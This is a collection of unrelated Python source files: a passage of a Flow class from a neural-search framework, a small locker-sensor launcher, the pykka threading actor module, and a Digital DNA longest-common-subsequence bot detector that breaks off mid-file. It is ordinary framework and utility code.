for deployment in pod.deployments:
graph.add_pod(
deployment['name'],
deployment['head_host'],
deployment['head_port_in'],
deployment['tail_port_out'],
deployment['head_zmq_identity'],
)
for end, pod in self._pod_nodes.items():
if end == GATEWAY_NAME:
end = f'end-{GATEWAY_NAME}'
if pod.head_args.hosts_in_connect is None:
pod.head_args.hosts_in_connect = []
if isinstance(pod, K8sPod):
from ..peapods.pods.k8slib import kubernetes_deployment
end = kubernetes_deployment.to_dns_name(end)
if end not in graph.pods:
end = end + '_head'
if isinstance(pod, K8sPod):
from ..peapods.pods.k8slib import kubernetes_deployment
end = kubernetes_deployment.to_dns_name(end)
for start in pod.needs:
start_pod = self._pod_nodes[start]
if start == GATEWAY_NAME:
start = f'start-{GATEWAY_NAME}'
if isinstance(start_pod, K8sPod):
from ..peapods.pods.k8slib import kubernetes_deployment
start = kubernetes_deployment.to_dns_name(start)
if start not in graph.pods:
start = start + '_tail'
if isinstance(start_pod, K8sPod):
from ..peapods.pods.k8slib import kubernetes_deployment
start = kubernetes_deployment.to_dns_name(start)
start_pod = graph._get_target_pod(start)
if pod.connect_to_predecessor or is_remote_local_connection(
start_pod.host, pod.head_host
):
pod.head_args.hosts_in_connect.append(
graph._get_target_pod(start).full_out_address
)
graph.add_edge(start, end, True)
else:
graph.add_edge(start, end)
# In case of sharding, the head and the tail pea have to be connected to the shards
for end, pod in self._pod_nodes.items():
if len(pod.deployments) > 0:
deployments = pod.deployments
for deployment in deployments[1:-1]:
graph.add_edge(deployments[0]['name'], deployment['name'])
graph.add_edge(deployment['name'], deployments[-1]['name'])
graph.active_pod = f'start-{GATEWAY_NAME}'
return graph
def _set_initial_dynamic_routing_table(self):
routing_table = self._get_routing_table()
if not routing_table.is_acyclic():
raise RoutingTableCyclicError(
'The routing graph has a cycle. This would result in an infinite loop. Fix your Flow setup.'
)
for pod in self._pod_nodes:
routing_table_copy = RoutingTable()
routing_table_copy.proto.CopyFrom(routing_table.proto)
self._pod_nodes[
pod
].args.static_routing_table = self.args.static_routing_table
# The gateway always needs the routing table to be set
if pod == GATEWAY_NAME:
self._pod_nodes[pod].args.routing_table = routing_table_copy.json()
# For other pods we only set it if we are told do so
elif self.args.static_routing_table:
routing_table_copy.active_pod = pod
self._pod_nodes[pod].args.routing_table = routing_table_copy.json()
# dynamic routing does not apply to shards in a CompoundPod, only its tail
if not isinstance(self._pod_nodes[pod], CompoundPod):
self._pod_nodes[pod].update_pea_args()
else:
self._pod_nodes[pod].tail_args.routing_table = self._pod_nodes[
pod
].args.routing_table
self._pod_nodes[
pod
].tail_args.static_routing_table = self.args.static_routing_table
@allowed_levels([FlowBuildLevel.EMPTY])
def build(self, copy_flow: bool = False) -> 'Flow':
"""
Build the current Flow and make it ready to use
.. note::
No need to manually call it since 0.0.8. When using Flow with the
context manager, or using :meth:`start`, :meth:`build` will be invoked.
:param copy_flow: when set to true, then always copy the current Flow and do the modification on top of it then return, otherwise, do in-line modification
:return: the current Flow (by default)
.. note::
``copy_flow=True`` is recommended if you are building the same Flow multiple times in a row. e.g.
.. highlight:: python
.. code-block:: python
f = Flow()
with f:
f.index()
with f.build(copy_flow=True) as fl:
fl.search()
.. # noqa: DAR401
"""
op_flow = copy.deepcopy(self) if copy_flow else self
if op_flow.args.inspect == FlowInspectType.COLLECT:
op_flow.gather_inspect(copy_flow=False)
if GATEWAY_NAME not in op_flow._pod_nodes:
op_flow._add_gateway(needs={op_flow.last_pod})
# if set no_inspect then all inspect related nodes are removed
if op_flow.args.inspect == FlowInspectType.REMOVE:
op_flow._pod_nodes = {
k: v for k, v in op_flow._pod_nodes.items() if not v.role.is_inspect
}
reverse_inspect_map = {v: k for k, v in op_flow._inspect_pods.items()}
for end, pod in op_flow._pod_nodes.items():
# if an endpoint is being inspected, then replace it with inspected Pod
# but not those inspect related node
if op_flow.args.inspect.is_keep:
pod.needs = set(
ep if pod.role.is_inspect else op_flow._inspect_pods.get(ep, ep)
for ep in pod.needs
)
else:
pod.needs = set(reverse_inspect_map.get(ep, ep) for ep in pod.needs)
op_flow._set_initial_dynamic_routing_table()
hanging_pods = _hanging_pods(op_flow)
if hanging_pods:
op_flow.logger.warning(
f'{hanging_pods} are hanging in this flow with no pod receiving from them, '
f'you may want to double check if it is intentional or some mistake'
)
op_flow._build_level = FlowBuildLevel.GRAPH
return op_flow
def __call__(self, *args, **kwargs):
"""Builds the Flow
:param args: args for build
:param kwargs: kwargs for build
:return: the built Flow
"""
return self.build(*args, **kwargs)
def __enter__(self):
with CatchAllCleanupContextManager(self):
return self.start()
def __exit__(self, exc_type, exc_val, exc_tb):
if hasattr(self, '_stop_event'):
self._stop_event.set()
super().__exit__(exc_type, exc_val, exc_tb)
# unset all envs to avoid any side-effect
if self.args.env:
for k in self.args.env.keys():
os.environ.pop(k, None)
# do not know why but removing these 2 lines make 2 tests fail
if GATEWAY_NAME in self._pod_nodes:
self._pod_nodes.pop(GATEWAY_NAME)
self._build_level = FlowBuildLevel.EMPTY
self.logger.debug('Flow is closed!')
self.logger.close()
def start(self):
"""Start to run all Pods in this Flow.
Remember to close the Flow with :meth:`close`.
Note that this method has a timeout of ``timeout_ready`` set in CLI,
which is inherited all the way from :class:`jina.peapods.peas.BasePea`
.. # noqa: DAR401
:return: this instance
"""
if self._build_level.value < FlowBuildLevel.GRAPH.value:
self.build(copy_flow=False)
if self.k8s_infrastructure_manager is not None:
self.enter_context(self.k8s_infrastructure_manager)
# set env only before the Pod get started
if self.args.env:
for k, v in self.args.env.items():
os.environ[k] = str(v)
for k, v in self:
if not getattr(v.args, 'external', False):
self.enter_context(v)
self._wait_until_all_ready()
self._build_level = FlowBuildLevel.RUNNING
return self
def _wait_until_all_ready(self):
results = {}
threads = []
def _wait_ready(_pod_name, _pod):
try:
if not getattr(_pod.args, 'external', False):
results[_pod_name] = 'pending'
_pod.wait_start_success()
results[_pod_name] = 'done'
except Exception as ex:
results[_pod_name] = repr(ex)
def _polling_status():
spinner = itertools.cycle(
['⠋', '⠙', '⠹', '⠸', '⠼', '⠴', '⠦', '⠧', '⠇', '⠏']
)
while True:
num_all = len(results)
num_done = 0
pendings = []
for _k, _v in results.items():
sys.stdout.flush()
if _v == 'pending':
pendings.append(_k)
else:
num_done += 1
sys.stdout.write('\r{}\r'.format(' ' * 100))
pending_str = colored(' '.join(pendings)[:50], 'yellow')
sys.stdout.write(
f'{colored(next(spinner), "green")} {num_done}/{num_all} waiting {pending_str} to be ready...'
)
sys.stdout.flush()
if not pendings:
sys.stdout.write('\r{}\r'.format(' ' * 100))
break
time.sleep(0.1)
# kick off all pods wait-ready threads
for k, v in self:
t = threading.Thread(
target=_wait_ready,
args=(
k,
v,
),
daemon=True,
)
threads.append(t)
t.start()
# kick off spinner thread
t_m = threading.Thread(target=_polling_status, daemon=True)
t_m.start()
# kick off ip getter thread
addr_table = []
t_ip = None
if self.args.infrastructure != InfrastructureType.K8S:
t_ip = threading.Thread(
target=self._get_address_table, args=(addr_table,), daemon=True
)
t_ip.start()
for t in threads:
t.join()
if t_ip is not None:
t_ip.join()
t_m.join()
error_pods = [k for k, v in results.items() if v != 'done']
if error_pods:
self.logger.error(
f'Flow is aborted due to {error_pods} can not be started.'
)
self.close()
raise RuntimeFailToStart
else:
if self.args.infrastructure == InfrastructureType.K8S:
success_msg = colored('🎉 Kubernetes Flow is ready to use!', 'green')
else:
success_msg = colored('🎉 Flow is ready to use!', 'green')
if addr_table:
self.logger.info(success_msg + '\n' + '\n'.join(addr_table))
self.logger.debug(
f'{self.num_pods} Pods (i.e. {self.num_peas} Peas) are running in this Flow'
)
@property
def num_pods(self) -> int:
"""Get the number of Pods in this Flow
.. # noqa: DAR201"""
return len(self._pod_nodes)
@property
def num_peas(self) -> int:
"""Get the number of peas (shards count) in this Flow
.. # noqa: DAR201"""
return sum(v.num_peas for v in self._pod_nodes.values())
def __eq__(self, other: 'Flow') -> bool:
"""
Compare the topology of a Flow with another Flow.
Identification is defined by whether two flows share the same set of edges.
:param other: the second Flow object
:return: result of equality check
"""
if self._build_level.value < FlowBuildLevel.GRAPH.value:
op_flow = copy.deepcopy(self)
a = op_flow.build()
else:
a = self
if other._build_level.value < FlowBuildLevel.GRAPH.value:
op_flow_b = copy.deepcopy(other)
b = op_flow_b.build()
else:
b = other
return a._pod_nodes == b._pod_nodes
@property
def client(self) -> 'BaseClient':
"""Return a :class:`BaseClient` object attach to this Flow.
.. # noqa: DAR201"""
kwargs = dict(
host=self.host,
port=self.port_expose,
protocol=self.protocol,
)
kwargs.update(self._common_kwargs)
return Client(**kwargs)
@property
def _mermaid_str(self):
mermaid_graph = [
'''
%%{init:{
"theme": "base",
"themeVariables": {
"primaryColor": "#fff",
"primaryBorderColor": "#fff",
"mainBkg": "#32C8CD",
"clusterBkg": "#EEEDE78C",
"secondaryBorderColor": "none",
"tertiaryBorderColor": "none",
"lineColor": "#a6d8da"
}
}}%%
'''.replace(
'\n', ''
),
'flowchart LR;',
]
pod_nodes = []
# plot subgraphs
for node, v in self._pod_nodes.items():
pod_nodes.append(v.name)
mermaid_graph.extend(v._mermaid_str)
for node, v in self._pod_nodes.items():
for need in sorted(v.needs):
need_print = need
if need == 'gateway':
need_print = 'gatewaystart[gateway]'
node_print = node
if node == 'gateway':
node_print = 'gatewayend[gateway]'
_s_role = self._pod_nodes[need].role
_e_role = self._pod_nodes[node].role
if getattr(self._pod_nodes[need].args, 'external', False):
_s_role = 'EXTERNAL'
if getattr(self._pod_nodes[node].args, 'external', False):
_e_role = 'EXTERNAL'
line_st = '-->'
if _s_role == PodRoleType.INSPECT or _e_role == PodRoleType.INSPECT:
line_st = '-.->'
mermaid_graph.append(
f'{need_print}:::{str(_s_role)} {line_st} {node_print}:::{str(_e_role)};'
)
mermaid_graph.append(f'classDef {str(PodRoleType.INSPECT)} stroke:#F29C9F')
mermaid_graph.append(f'classDef {str(PodRoleType.JOIN_INSPECT)} stroke:#F29C9F')
mermaid_graph.append(
f'classDef {str(PodRoleType.GATEWAY)} fill:none,color:#000,stroke:none'
)
mermaid_graph.append(
f'classDef {str(PodRoleType.INSPECT_AUX_PASS)} stroke-dasharray: 2 2'
)
mermaid_graph.append(f'classDef HEADTAIL fill:#32C8CD1D')
mermaid_graph.append(f'\nclassDef EXTERNAL fill:#fff,stroke:#32C8CD')
return '\n'.join(mermaid_graph)
def plot(
self,
output: Optional[str] = None,
vertical_layout: bool = False,
inline_display: bool = False,
build: bool = True,
copy_flow: bool = True,
) -> 'Flow':
"""
Visualize the Flow up to the current point
If a file name is provided it will create a jpg image with that name,
otherwise it will display the URL for mermaid.
If called within IPython notebook, it will be rendered inline,
otherwise an image will be created.
Example,
.. highlight:: python
.. code-block:: python
flow = Flow().add(name='pod_a').plot('flow.svg')
:param output: a filename specifying the name of the image to be created,
the suffix svg/jpg determines the file type of the output image
:param vertical_layout: top-down or left-right layout
:param inline_display: show image directly inside the Jupyter Notebook
:param build: build the Flow first before plotting, gateway connection can be better showed
:param copy_flow: when set to true, then always copy the current Flow and
do the modification on top of it then return, otherwise, do in-line modification
:return: the Flow
"""
# deepcopy causes the below error while reusing a Flow in Jupyter
# 'Pickling an AuthenticationString object is disallowed for security reasons'
op_flow = copy.deepcopy(self) if copy_flow else self
if build:
op_flow.build(False)
mermaid_str = op_flow._mermaid_str
if vertical_layout:
mermaid_str = mermaid_str.replace('graph LR', 'graph TD')
image_type = 'svg'
if output and not output.endswith('svg'):
image_type = 'img'
url = op_flow._mermaid_to_url(mermaid_str, image_type)
showed = False
if inline_display:
try:
from IPython.display import display, Image
display(Image(url=url))
showed = True
except:
# no need to panic users
pass
if output:
download_mermaid_url(url, output)
elif not showed:
op_flow.logger.info(f'flow visualization: {url}')
return self
def _ipython_display_(self):
"""Displays the object in IPython as a side effect"""
self.plot(
inline_display=True, build=(self._build_level != FlowBuildLevel.GRAPH)
)
def _mermaid_to_url(self, mermaid_str: str, img_type: str) -> str:
"""
Render the current Flow as URL points to a SVG. It needs internet connection
:param mermaid_str: the mermaid representation
:param img_type: image type (svg/jpg)
:return: the url points to a SVG
"""
encoded_str = base64.b64encode(bytes(mermaid_str, 'utf-8')).decode('utf-8')
return f'https://mermaid.ink/{img_type}/{encoded_str}'
@property
def port_expose(self) -> int:
"""Return the exposed port of the gateway
.. # noqa: DAR201
"""
if GATEWAY_NAME in self._pod_nodes:
return self._pod_nodes[GATEWAY_NAME].args.port_expose
else:
return self._common_kwargs.get('port_expose', None)
@port_expose.setter
def port_expose(self, value: int):
"""Set the new exposed port of the Flow (affects Gateway and Client)
:param value: the new port to expose
"""
self._common_kwargs['port_expose'] = value
# Flow is build to graph already
if self._build_level >= FlowBuildLevel.GRAPH:
self[GATEWAY_NAME].args.port_expose = self._common_kwargs['port_expose']
# Flow is running already, then close the existing gateway
if self._build_level >= FlowBuildLevel.RUNNING:
self[GATEWAY_NAME].close()
self.enter_context(self[GATEWAY_NAME])
self[GATEWAY_NAME].wait_start_success()
@property
def host(self) -> str:
"""Return the local address of the gateway
.. # noqa: DAR201
"""
if GATEWAY_NAME in self._pod_nodes:
return self._pod_nodes[GATEWAY_NAME].host
else:
return self._common_kwargs.get('host', __default_host__)
@host.setter
def host(self, value: str):
"""Set the new host of the Flow (affects Gateway and Client)
:param value: the new port to expose
"""
self._common_kwargs['host'] = value
# Flow is build to graph already
if self._build_level >= FlowBuildLevel.GRAPH:
self[GATEWAY_NAME].args.host = self._common_kwargs['host']
# Flow is running already, then close the existing gateway
if self._build_level >= FlowBuildLevel.RUNNING:
self[GATEWAY_NAME].close()
self.enter_context(self[GATEWAY_NAME])
self[GATEWAY_NAME].wait_start_success()
@property
def address_private(self) -> str:
"""Return the private IP address of the gateway for connecting from other machine in the same network
.. # noqa: DAR201"""
return get_internal_ip()
@property
def address_public(self) -> str:
"""Return the public IP address of the gateway for connecting from other machine in the public network
.. # noqa: DAR201"""
return get_public_ip()
def __iter__(self):
return self._pod_nodes.items().__iter__()
def _get_address_table(self, address_table):
address_table.extend(
[
f'\t🔗 Protocol: \t\t{colored(self.protocol, attrs="bold")}',
f'\t🏠 Local access:\t'
+ colored(f'{self.host}:{self.port_expose}', 'cyan', attrs='underline'),
f'\t🔒 Private network:\t'
+ colored(
f'{self.address_private}:{self.port_expose}',
'cyan',
attrs='underline',
),
]
)
if self.address_public:
address_table.append(
f'\t🌐 Public address:\t'
+ colored(
f'{self.address_public}:{self.port_expose}',
'cyan',
attrs='underline',
)
)
if self.protocol == GatewayProtocolType.HTTP:
address_table.append(
f'\t💬 Swagger UI:\t\t'
+ colored(
f'http://localhost:{self.port_expose}/docs',
'cyan',
attrs='underline',
)
)
address_table.append(
f'\t📚 Redoc:\t\t'
+ colored(
f'http://localhost:{self.port_expose}/redoc',
'cyan',
attrs='underline',
)
)
return address_table
def block(
self, stop_event: Optional[Union[threading.Event, multiprocessing.Event]] = None
):
"""Block the Flow until `stop_event` is set or user hits KeyboardInterrupt
:param stop_event: a threading event or a multiprocessing event that onces set will resume the control Flow
to main thread.
"""
try:
if stop_event is None:
self._stop_event = (
threading.Event()
) #: this allows `.close` to close the Flow from another thread/proc
self._stop_event.wait()
else:
stop_event.wait()
except KeyboardInterrupt:
pass
@property
def protocol(self) -> GatewayProtocolType:
"""Return the protocol of this Flow
:return: the protocol of this Flow
"""
v = self._common_kwargs.get('protocol', GatewayProtocolType.GRPC)
if isinstance(v, str):
v = GatewayProtocolType.from_string(v)
return v
@protocol.setter
def protocol(self, value: Union[str, GatewayProtocolType]):
"""Set the protocol of this Flow
:param value: the protocol to set
"""
if isinstance(value, str):
self._common_kwargs['protocol'] = GatewayProtocolType.from_string(value)
elif isinstance(value, GatewayProtocolType):
self._common_kwargs['protocol'] = value
else:
raise TypeError(f'{value} must be either `str` or `GatewayProtocolType`')
# Flow is build to graph already
if self._build_level >= FlowBuildLevel.GRAPH:
self[GATEWAY_NAME].args.protocol = self._common_kwargs['protocol']
# Flow is running already, then close the existing gateway
if self._build_level >= FlowBuildLevel.RUNNING:
self[GATEWAY_NAME].close()
self.enter_context(self[GATEWAY_NAME])
self[GATEWAY_NAME].wait_start_success()
def __getitem__(self, item):
if isinstance(item, str):
return self._pod_nodes[item]
elif isinstance(item, int):
return list(self._pod_nodes.values())[item]
else:
raise TypeError(f'{typename(item)} is not supported')
@property
def workspace(self) -> str:
"""Return the workspace path of the flow.
.. # noqa: DAR201"""
return os.path.abspath(self.args.workspace or './')
@workspace.setter
def workspace(self, value: str):
"""set workspace dir for flow & all pods
:param value: workspace to be set
"""
self.args.workspace = value
for k, p in self:
p.args.workspace = value
@property
def workspace_id(self) -> Dict[str, str]:
"""Get all Pods' ``workspace_id`` values in a dict
.. # noqa: DAR201"""
return {
k: p.args.workspace_id for k, p in self if hasattr(p.args, 'workspace_id')
}
@workspace_id.setter
def workspace_id(self, value: str):
"""Set all Pods' ``workspace_id`` to ``value``
:param value: a hexadecimal UUID string
"""
uuid.UUID(value)
for k, p in self:
if hasattr(p.args, 'workspace_id'):
p.args.workspace_id = value
args = getattr(p, 'peas_args', getattr(p, 'shards_args', None))
if args is None:
raise ValueError(
f'could not find "peas_args" or "shards_args" on {p}'
)
values = None
if isinstance(args, dict):
values = args.values()
elif isinstance(args, list):
values = args
for v in values:
if v and isinstance(v, argparse.Namespace):
v.workspace_id = value
if v and isinstance(v, List):
for i in v:
i.workspace_id = value
@property
def env(self) -> Optional[Dict]:
"""Get all envs to be set in the Flow
:return: envs as dict
"""
return self.args.env
@env.setter
def env(self, value: Dict[str, str]):
"""set env vars for flow & all pods.
This can be used by jinad to set envs for Flow and all child objects
:param value: value to be set
"""
self.args.env = value
for k, v in self:
v.args.env = value
@property
def identity(self) -> Dict[str, str]:
"""Get all Pods' ``identity`` values in a dict
.. # noqa: DAR201
"""
return {k: p.args.identity for k, p in self}
@identity.setter
def identity(self, value: str):
"""Set all Pods' ``identity`` to ``value``
:param value: a hexadecimal UUID string
"""
uuid.UUID(value)
# Re-initiating logger with new identity
self.logger = JinaLogger(self.__class__.__name__, **vars(self.args))
for _, p in self:
p.args.identity = value
@overload
def expose_endpoint(self, exec_endpoint: str, path: Optional[str] = None):
"""Expose an Executor's endpoint (defined by `@requests(on=...)`) to HTTP endpoint for easier access.
After expose, you can send data request directly to `http://hostname:port/endpoint`.
:param exec_endpoint: the endpoint string, by convention starts with `/`
:param path: the HTTP endpoint string, when not given, it is `exec_endpoint`
"""
...
@overload
def expose_endpoint(
self,
exec_endpoint: str,
*,
path: Optional[str] = None,
status_code: int = 200,
tags: Optional[List[str]] = None,
summary: Optional[str] = None,
description: Optional[str] = None,
response_description: str = 'Successful Response',
deprecated: Optional[bool] = None,
methods: Optional[List[str]] = None,
operation_id: Optional[str] = None,
response_model_by_alias: bool = True,
response_model_exclude_unset: bool = False,
response_model_exclude_defaults: bool = False,
response_model_exclude_none: bool = False,
include_in_schema: bool = True,
name: Optional[str] = None,
):
"""Expose an Executor's endpoint (defined by `@requests(on=...)`) to HTTP endpoint for easier access.
After expose, you can send data request directly to `http://hostname:port/endpoint`.
Use this method to specify your HTTP endpoint with richer semantic and schema.
:param exec_endpoint: the endpoint string, by convention starts with `/`
# noqa: DAR101
"""
...
def expose_endpoint(self, exec_endpoint: str, **kwargs):
"""Expose an Executor's endpoint (defined by `@requests(on=...)`) to HTTP endpoint for easier access.
After expose, you can send data request directly to `http://hostname:port/endpoint`.
:param exec_endpoint: the endpoint string, by convention starts with `/`
# noqa: DAR101
# noqa: DAR102
"""
self._endpoints_mapping[exec_endpoint] = kwargs
# for backward support
join = needs
def rolling_update(
self,
pod_name: str,
dump_path: Optional[str] = None,
*,
uses_with: Optional[Dict] = None,
):
"""
Reload all replicas of a pod sequentially
:param pod_name: pod to update
:param dump_path: **backwards compatibility** This function was only accepting dump_path as the only potential arg to override
:param uses_with: a Dictionary of arguments to restart the executor with
"""
from ..helper import run_async
run_async(
self._pod_nodes[pod_name].rolling_update,
dump_path=dump_path,
uses_with=uses_with,
any_event_loop=True,
)
@property
def client_args(self) -> argparse.Namespace:
"""Get Client settings.
# noqa: DAR201
"""
if 'port_expose' in self._common_kwargs:
kwargs = copy.deepcopy(self._common_kwargs)
kwargs['port'] = self._common_kwargs['port_expose']
return ArgNamespace.kwargs2namespace(kwargs, set_client_cli_parser())
@property
def gateway_args(self) -> argparse.Namespace:
"""Get Gateway settings.
# noqa: DAR201
"""
return ArgNamespace.kwargs2namespace(self._common_kwargs, set_gateway_parser())
def update_network_interface(self, **kwargs):
"""Update the network interface of this Flow (affects Gateway & Client)
:param kwargs: new network settings
"""
self._common_kwargs.update(kwargs)
|
main.py
|
if __name__ == "__main__":
from time import sleep
import json
from multiprocessing import *
from src import ui
from src.utils import sensor_listener, locker_state
LCKMngKey = ""
procs = []
app = ui.App()
proc1 = Process(target=app.mainloop, args=())
procs.append(proc1)
proc1.start()
while not LCKMngKey:
try:
with open("data/information.json") as f:
file_read = f.readlines()
if not file_read:
sleep(1)
else:
json_object = json.loads("".join(file_read))
LCKMngKey = json_object["LCKMngKey"]
except FileNotFoundError as e:
pass
sListener = sensor_listener.SensorListener(LCKMngKey)
proc2 = Process(target=sListener.listen, args=())
procs.append(proc2)
proc2.start()
sBehavior = locker_state.LockerState()
proc3 = Process(target=sBehavior.check_door, args=())
procs.append(proc3)
proc3.start()
# for p in procs:
# p.start()
for p in procs:
p.join()
|
_threading.py
|
import queue
import sys
import threading
from typing import Any, NamedTuple, Optional
from pykka import Actor, Future, Timeout
from pykka._types import OptExcInfo
__all__ = ["ThreadingActor", "ThreadingFuture"]
class ThreadingFutureResult(NamedTuple):
value: Optional[Any] = None
exc_info: Optional[OptExcInfo] = None
class ThreadingFuture(Future):
"""
:class:`ThreadingFuture` implements :class:`Future` for use with
:class:`ThreadingActor <pykka.ThreadingActor>`.
The future is implemented using a :class:`queue.Queue`.
The future does *not* make a copy of the object which is :meth:`set()
<pykka.Future.set>` on it. It is the setters responsibility to only pass
immutable objects or make a copy of the object before setting it on the
future.
.. versionchanged:: 0.14
Previously, the encapsulated value was a copy made with
:func:`copy.deepcopy`, unless the encapsulated value was a future, in
which case the original future was encapsulated.
"""
def __init__(self):
super().__init__()
self._queue = queue.Queue(maxsize=1)
self._result = None
def get(self, timeout=None):
try:
return super().get(timeout=timeout)
except NotImplementedError:
pass
try:
if self._result is None:
self._result = self._queue.get(True, timeout)
if self._result.exc_info is not None:
(exc_type, exc_value, exc_traceback) = self._result.exc_info
if exc_value is None:
exc_value = exc_type()
if exc_value.__traceback__ is not exc_traceback:
raise exc_value.with_traceback(exc_traceback)
raise exc_value
else:
return self._result.value
except queue.Empty:
raise Timeout(f"{timeout} seconds")
def set(self, value=None):
self._queue.put(ThreadingFutureResult(value=value), block=False)
def set_exception(self, exc_info=None):
assert exc_info is None or len(exc_info) == 3
if exc_info is None:
exc_info = sys.exc_info()
self._queue.put(ThreadingFutureResult(exc_info=exc_info))
class ThreadingActor(Actor):
"""
:class:`ThreadingActor` implements :class:`Actor` using regular Python
threads.
This implementation is slower than :class:`GeventActor
<pykka.gevent.GeventActor>`, but can be used in a process with other
threads that are not Pykka actors.
"""
use_daemon_thread = False
"""
A boolean value indicating whether this actor is executed on a thread that
is a daemon thread (:class:`True`) or not (:class:`False`). This must be
set before :meth:`pykka.Actor.start` is called, otherwise
:exc:`RuntimeError` is raised.
The entire Python program exits when no alive non-daemon threads are left.
This means that an actor running on a daemon thread may be interrupted at
any time, and there is no guarantee that cleanup will be done or that
:meth:`pykka.Actor.on_stop` will be called.
Actors do not inherit the daemon flag from the actor that made it. It
always has to be set explicitly for the actor to run on a daemonic thread.
"""
@staticmethod
def _create_actor_inbox():
return queue.Queue()
@staticmethod
def _create_future():
return ThreadingFuture()
def _start_actor_loop(self):
thread = threading.Thread(target=self._actor_loop)
thread.name = thread.name.replace("Thread", self.__class__.__name__)
thread.daemon = self.use_daemon_thread
thread.start()
|
lcs.py
|
"""
This is a module to be used as a reference for building other modules
"""
import warnings
from glcr import longest_common_subsequence
from multiprocessing import Process
import numpy as np
import pandas as pd
from matplotlib import pyplot as plt
from sklearn.base import BaseEstimator
from sklearn.utils.validation import check_array
from .verbosity import Verbosity
# noinspection PyIncorrectDocstring
class LongestCommonSubsequence(BaseEstimator):
""" The Digital DNA Python implementation.
Parameters
----------
in_path : str, optional
The name with absolute path of a file containing the sequences you want to process.
The input file must be a txt file and the first row must contain the number of sequences to read.
Default: ''
out_path : str, optional
The output file name with absolute path of the file where the algorithm will save result in case of
verbosity equals to `Verbosity.FILE` or `Verbosity.FILE_EXTENDED`.
Default: '/tmp/glcr_cache'
overwrite : boolean, optional
It must be False to use the LCS files produced in a previous fit call, in this case the file names are
the ones specified in the out_path parameter. If True, recomputes the LCS files.
Default: False
threshold : boolean, optional
It must be False to use the LCS files produced in a previous fit call, in this case the file names are
the ones specified in the out_path parameter. If True, recomputes the LCS files.
Default: False
window : str, optional
The size of the window used to compute the cutting threshold between bot and not bot. The cutting point is
computed by smoothing the curve, deriving the result and taking the first (l.h.s.) local maxima. The window
parameter influences both smoothing and finding the local maxima.
It must be 2 < window < n_accounts.
Default: 10
verbosity : str, optional
The verbosity parameter is used to specify whether to save results to files or not. It must be:\n
- TEST does not write anything, used for benchmarking
- MEMORY_ONLY retrieves only the couples (sequence length, # of accounts), used for plots
- FILE produces 2 files, a file named out_path + '.gsa' where each row contains the identifier of the sequence. In the other file, named out_path + '.mat', each row contains:\n
- sequence length
- # of accounts
- range of indexes (begin and end)
- FILE_EXTENDED as FILE but the in_path + '.mat' file contains also the column of the common subsequence
References
----------
S. Cresci, R. D. Pietro, M. Petrocchi, A. Spognardi and M. Tesconi,
"Social Fingerprinting: Detection of Spambot Groups Through DNA-Inspired Behavioral Modeling",
IEEE Transactions on Dependable and Secure Computing, vol. 15, no. 4, pp. 561-576, 1 July-Aug. 2018,
https://ieeexplore.ieee.org/document/7876716
S. Cresci, R. di Pietro, M. Petrocchi, A. Spognardi and M. Tesconi,
"Exploiting Digital DNA for the Analysis of Similarities in Twitter Behaviours",
2017 IEEE International Conference on Data Science and Advanced Analytics (DSAA),
Tokyo, 2017, pp. 686-695, https://ieeexplore.ieee.org/document/8259831
M. Arnold, E. Ohlebusch, "Linear Time Algorithms for Generalizations of the Longest Common Substring Problem",
Algorithmica, vol 60, pp. 806-818, 4 August 2011, https://link.springer.com/article/10.1007/s00453-009-9369-1
"""
def __init__(self, in_path='', out_path='/tmp/glcr_cache', overwrite=False, threshold='auto', window=10, verbosity=Verbosity.FILE):
self.in_path = in_path
self.out_path = out_path
self.overwrite = overwrite
self.threshold = threshold
self.window = window
if self.window < 2:
raise ValueError('window parameter cannot be less than 2.')
self.verbosity = verbosity
def fit(self, X, y=None):
"""Computes the longest common subsequence
Parameters
----------
X : array-like or sparse matrix of shape = [n_samples, n_features]
The training input samples.
y : None
There is no need of a target in a transformer, yet the pipeline API
requires this parameter.
Attributes
----------
lcs_index_ : pandas dataframe, shape (distinct couples (lcs, n_of_accounts), 2), default=None
The dataframe containing the distict couples lcs, n_of_accounts). Only if:
verbosity == Verbosity.MEMORY_ONLY
Returns
-------
self : object
Returns self.
"""
warnings.simplefilter(action='ignore', category=FutureWarning)
self.gsa_ = '.gsa'
self.mat_ = '.mat'
if self.in_path == '':
X = self._unicode_to_ascii(X)
X = check_array(X, ensure_2d=False)
print("fitting...")
if self.verbosity == Verbosity.MEMORY_ONLY:
self.lcs_ = longest_common_subsequence(self._unicode_to_ascii(X), self.in_path, self.out_path,
self.verbosity)
elif self.verbosity > Verbosity.MEMORY_ONLY:
if self.in_path == '' or self.overwrite:
p = Process(target=longest_common_subsequence, args=(X, self.in_path, self.out_path, self.verbosity))
p.start()
p.join()
return self
def predict(self, X=None):
""" Predict the labels (True bot, False Not Bot) of X according to lcs and window parameter:.
If X is None, returns the same as fit_predict(X_train).
Parameters
----------
X : array-like, shape (n_samples, n_features), default=None
The query sample or samples to identify bot groups. If None,
makes prediction on the training data.
Returns
-------
y : array, shape (n_samples,)
Returns True for bots and False for real timeline.
"""
y = None
if self.verbosity > Verbosity.MEMORY_ONLY:
y = np.full(len(X), False)
mat_ix = set()
if self.threshold == 'auto':
print('finding cut...')
lengths = pd.read_csv(self.out_path+self.mat_, usecols=['length']).length.values
self.cut_ = self._decision_function(lengths)
else:
self.cut_ = self.threshold
print('predicting...')
class BreakIt(Exception):
pass
try:
for df in pd.read_csv(self.out_path + self.mat_, chunksize=500000):
for ix, row in df.iterrows():
curr_set = mat_ix.union(set(range(int(row.begin), int(row.end) + 1)))
if row.num_texts >= self.cut_: # not bot, exit
raise BreakIt
mat_ix = curr_set
except BreakIt:
pass
ix_size = len(mat_ix)
ix_count = 0
bot_ix = np.empty(ix_size, dtype=int)
try:
for df in pd.read_csv(self.out_path + self.gsa_, header=0, usecols=['wordindex'], squeeze=True,
chunksize=500000):
for ix, wordindex in df.items():
if ix in mat_ix:
# TODO delete the -1 when fix the gsa file
bot_ix[ix_count] = wordindex - 1
ix_count += 1
if ix_count == ix_size:
raise BreakIt
mat_ix.remove(ix)
except BreakIt:
y[bot_ix] = True
else:
warnings.warn("Cannot predict with verbosity level lower than FILE", Warning)
print('done.')
return y
def fit_predict(self, X, y=None):
""""Fits the model to the training set X and returns the labels
(True for bot, False for non bot) on the training set according to the window parameter.
Parameters
----------
X : array-like, shape (n_samples, n_features), default=None
The query sample or samples to compute the Local Outlier Factor
w.r.t. to the training samples.
Attributes
----------
lcs_index_ : pandas dataframe, shape (distinct couples (lcs, n_of_accounts), 2), default=None
The dataframe containing the distict couples lcs, n_of_accounts)
Returns
-------
y : array, shape (n_samples,)
Returns True for bots and False for real timeline.
"""
return self.fit(X).predict(X)
def plot_LCS(self):
